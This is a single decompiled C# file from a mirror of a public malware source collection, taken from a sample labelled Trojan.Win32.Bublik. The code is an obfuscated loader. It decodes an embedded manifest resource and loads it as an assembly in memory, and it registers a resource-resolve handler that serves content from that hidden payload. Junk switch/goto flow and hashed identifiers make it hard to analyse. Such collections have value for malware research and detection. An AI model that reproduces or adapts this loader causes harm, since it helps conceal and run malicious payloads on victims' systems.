mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 09:56:10 +00:00
f2ac1ece55
add
95 lines
3.2 KiB
C#
95 lines
3.2 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: A.ced138b6eee8b5fea3f196334f6720805
|
|
// Assembly: Club, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: A9E8E336-37BF-4AEB-A0AA-C09A4AE1EC93
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-ed0d569ec8fd2e2d6812dba8d62238da6ea0bd69bdb94d8701830057b4b02ac4.exe
|
|
|
|
using System;
|
|
using System.Reflection;
|
|
|
|
namespace A
|
|
{
|
|
internal class ced138b6eee8b5fea3f196334f6720805
|
|
{
|
|
private static readonly Assembly c7956d9417023ac40f6a0eb5665bf366c;
|
|
|
|
static ced138b6eee8b5fea3f196334f6720805()
|
|
{
|
|
if ((object) ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c != null)
|
|
return;
|
|
label_1:
|
|
switch (3)
|
|
{
|
|
case 0:
|
|
goto label_1;
|
|
default:
|
|
if (false)
|
|
{
|
|
// ISSUE: method reference
|
|
RuntimeMethodHandle runtimeMethodHandle = __methodref (ced138b6eee8b5fea3f196334f6720805.\u002Ecctor);
|
|
}
|
|
Assembly executingAssembly = Assembly.GetExecutingAssembly();
|
|
string name = executingAssembly.GetName().Name;
|
|
foreach (string manifestResourceName in executingAssembly.GetManifestResourceNames())
|
|
{
|
|
if (name == manifestResourceName)
|
|
{
|
|
label_6:
|
|
switch (3)
|
|
{
|
|
case 0:
|
|
goto label_6;
|
|
default:
|
|
ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c = Assembly.Load(c5269112b03e601219f1714817a27b79a.c09b1f452b50c37ba72a9d599e693a36c(executingAssembly.GetManifestResourceStream(name)));
|
|
return;
|
|
}
|
|
}
|
|
}
|
|
label_10:
|
|
switch (7)
|
|
{
|
|
case 0:
|
|
goto label_10;
|
|
default:
|
|
return;
|
|
}
|
|
}
|
|
}
|
|
|
|
internal static void c496a7d7e6524413c65d8aa7379640bb1() => AppDomain.CurrentDomain.ResourceResolve += new ResolveEventHandler(ced138b6eee8b5fea3f196334f6720805.c3e00543c0030da506a3c9417db159586);
|
|
|
|
private static Assembly c3e00543c0030da506a3c9417db159586(
|
|
object c932adab82a8e17f3df4be69b90bf6c46,
|
|
ResolveEventArgs c40515e8f64a790a3f5078c209ce553e3)
|
|
{
|
|
if ((object) ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c == null)
|
|
return ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c;
|
|
label_1:
|
|
switch (7)
|
|
{
|
|
case 0:
|
|
goto label_1;
|
|
default:
|
|
if (false)
|
|
{
|
|
// ISSUE: method reference
|
|
RuntimeMethodHandle runtimeMethodHandle = __methodref (ced138b6eee8b5fea3f196334f6720805.c3e00543c0030da506a3c9417db159586);
|
|
}
|
|
foreach (string manifestResourceName in ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c.GetManifestResourceNames())
|
|
{
|
|
if (manifestResourceName == c40515e8f64a790a3f5078c209ce553e3.Name)
|
|
return ced138b6eee8b5fea3f196334f6720805.c7956d9417023ac40f6a0eb5665bf366c;
|
|
}
|
|
label_9:
|
|
switch (4)
|
|
{
|
|
case 0:
|
|
goto label_9;
|
|
default:
|
|
return (Assembly) null;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|